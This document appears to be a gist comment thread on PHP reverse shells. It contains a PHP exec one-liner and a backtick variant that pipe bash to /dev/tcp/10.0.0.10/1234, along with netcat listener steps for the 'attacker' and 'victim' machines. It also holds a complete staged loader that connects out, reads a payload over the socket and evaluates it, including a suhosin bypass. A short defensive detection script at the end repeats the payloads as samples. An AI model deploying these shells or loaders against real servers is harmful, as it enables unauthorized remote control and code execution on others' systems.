<?php
exec("/bin/bash -c 'bash -i >& /dev/tcp/10.0.0.10/1234 0>&1'");
It was bash, not PHP.
> It was bash, not PHP.
@Cvar1984
It uses PHP to call a system command that opens a TCP socket that serves a bash shell to an IP/port.
Then you can connect to that IP/port and get access to this bash shell.
The script from the first post only works on Unix-based OSes with the bash shell executable in the "/bin/" path.
> > It was bash, not PHP.
> @Cvar1984 It uses PHP to call a system command that opens a TCP socket that serves a bash shell to an IP/port. Then you can connect to that IP/port and get access to this bash shell. The script from the first post only works on Unix-based OSes with the bash shell executable in the "/bin/" path.
Yeah, I know it spawns bash using a PHP system call.
Then this is the tiniest
<?=`"/bin/bash -c 'bash -i >& /dev/tcp/10.0.0.10/1234 0>&1'"`?>
> > > It was bash, not PHP.
> > @Cvar1984 It uses PHP to call a system command that opens a TCP socket that serves a bash shell to an IP/port. Then you can connect to that IP/port and get access to this bash shell. The script from the first post only works on Unix-based OSes with the bash shell executable in the "/bin/" path.
> Yeah, I know it spawns bash using a PHP system call.
Yes, but the solution from Rapid7 works on any operating system because it does not utilize any system calls.
I don't know which IP to use, can someone please help me!
I'm on a VPN! In a virtual machine! I don't know whether to use the IP of the VPN connection, of the virtual machine, or of my own machine!
> I'm on a VPN! In a virtual machine! I don't know whether to use the IP of the VPN connection, of the virtual machine, or of my own machine!
- You have two machines, the attacker and the victim. The victim must have network access to the attacker. (Same network; if you are in a VPN, both machines must be in that network, and those are the important IPs.)
- You have to open a listening port on your attacking machine (nc -nvlp 1234).
- You have to open a reverse shell and point it to your attacking machine (VPN IP and open listening port).
And that's all.
@SergioChicoITCL thank you very much, champ! You're the best!
This will work with any operating system on a server. This is a module from Rapid7 that should be used with their handler but you don't have to. Keep in mind this is a staged payload.
/*<?php /**/ error_reporting(0);
$ip = 'PUT YOUR IP';
$port = PUT YOUR PORT;
if (($f = 'stream_socket_client') && is_callable($f)) {
    $s = $f("tcp://{$ip}:{$port}");
    $s_type = 'stream';
}
if (!$s && ($f = 'fsockopen') && is_callable($f)) {
    $s = $f($ip, $port);
    $s_type = 'stream';
}
if (!$s && ($f = 'socket_create') && is_callable($f)) {
    $s = $f(AF_INET, SOCK_STREAM, SOL_TCP);
    $res = @socket_connect($s, $ip, $port);
    if (!$res) { die(); }
    $s_type = 'socket';
}
if (!$s_type) { die('no socket funcs'); }
if (!$s) { die('no socket'); }
switch ($s_type) {
    case 'stream': $len = fread($s, 4); break;
    case 'socket': $len = socket_read($s, 4); break;
}
if (!$len) { die(); }
$a = unpack("Nlen", $len);
$len = $a['len'];
$b = '';
while (strlen($b) < $len) {
    switch ($s_type) {
        case 'stream': $b .= fread($s, $len-strlen($b)); break;
        case 'socket': $b .= socket_read($s, $len-strlen($b)); break;
    }
}
$GLOBALS['msgsock'] = $s;
$GLOBALS['msgsock_type'] = $s_type;
if (extension_loaded('suhosin') && ini_get('suhosin.executor.disable_eval')) {
    $suhosin_bypass=create_function('', $b);
    $suhosin_bypass();
} else {
    eval($b);
}
die();
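A defender-side sketch, added here and not part of the gist or any comment above: static heuristics that flag the three payload shapes discussed in this thread (a shell function with /dev/tcp, the backtick operator with /dev/tcp, and the loader that reads from a socket and evaluates the result). The rule names, the `scan_php` function and the sample strings are constructed for illustration; pattern matching like this is a triage aid and is defeated by obfuscation.

```python
import re

# PHP functions that pass a string to the OS shell.
SHELL_FUNCS = r"(?:exec|system|shell_exec|passthru|popen|proc_open)"
# Bash's /dev/tcp/<host>/<port> pseudo-device used by both one-liners.
DEV_TCP = r"/dev/tcp/[^/\s'\"]+/\d+"

RULES = {
    # exec("... /dev/tcp/host/port ...") and similar calls
    "shell_func_dev_tcp": re.compile(
        r"\b" + SHELL_FUNCS + r"\s*\([^;]*" + DEV_TCP, re.I | re.S),
    # `... /dev/tcp/host/port ...` via PHP's backtick execution operator
    "backtick_dev_tcp": re.compile(r"`[^`]*" + DEV_TCP + r"[^`]*`", re.S),
}

# The staged loader never touches a shell: it opens an outbound socket,
# reads from it and evaluates what it read. Socket function names are
# matched as bare words because the loader calls them through a variable.
SOCK_OPEN = re.compile(r"\b(?:stream_socket_client|fsockopen|socket_connect)\b", re.I)
SOCK_READ = re.compile(r"\b(?:fread|socket_read)\s*\(", re.I)
DYN_EVAL = re.compile(r"\b(?:eval|create_function)\s*\(", re.I)


def scan_php(source: str) -> list[str]:
    """Return the names of the heuristics that match one PHP source string."""
    hits = [name for name, rx in RULES.items() if rx.search(source)]
    if all(rx.search(source) for rx in (SOCK_OPEN, SOCK_READ, DYN_EVAL)):
        hits.append("socket_read_then_eval")
    return hits


# Constructed samples: the two one-liners from the thread, an abridged
# loader and a benign script that uses a socket but never evaluates input.
SAMPLES = {
    "exec.php": r'''<?php exec("/bin/bash -c 'bash -i >& /dev/tcp/10.0.0.10/1234 0>&1'");''',
    "tick.php": r'''<?=`"/bin/bash -c 'bash -i >& /dev/tcp/10.0.0.10/1234 0>&1'"`?>''',
    "stage.php": r'''<?php $f = 'fsockopen'; $s = $f($ip, $port);
        $len = fread($s, 4); /* ... */ eval($b);''',
    "banner.php": r'''<?php $s = fsockopen('mail.example.test', 25);
        echo fread($s, 128); fclose($s);''',
}

if __name__ == "__main__":
    for name, src in SAMPLES.items():
        print(f"{name}: {scan_php(src) or 'clean'}")
```

The third rule matters because the loader contains no shell function and no /dev/tcp string, so rules keyed on command execution alone would pass it as clean.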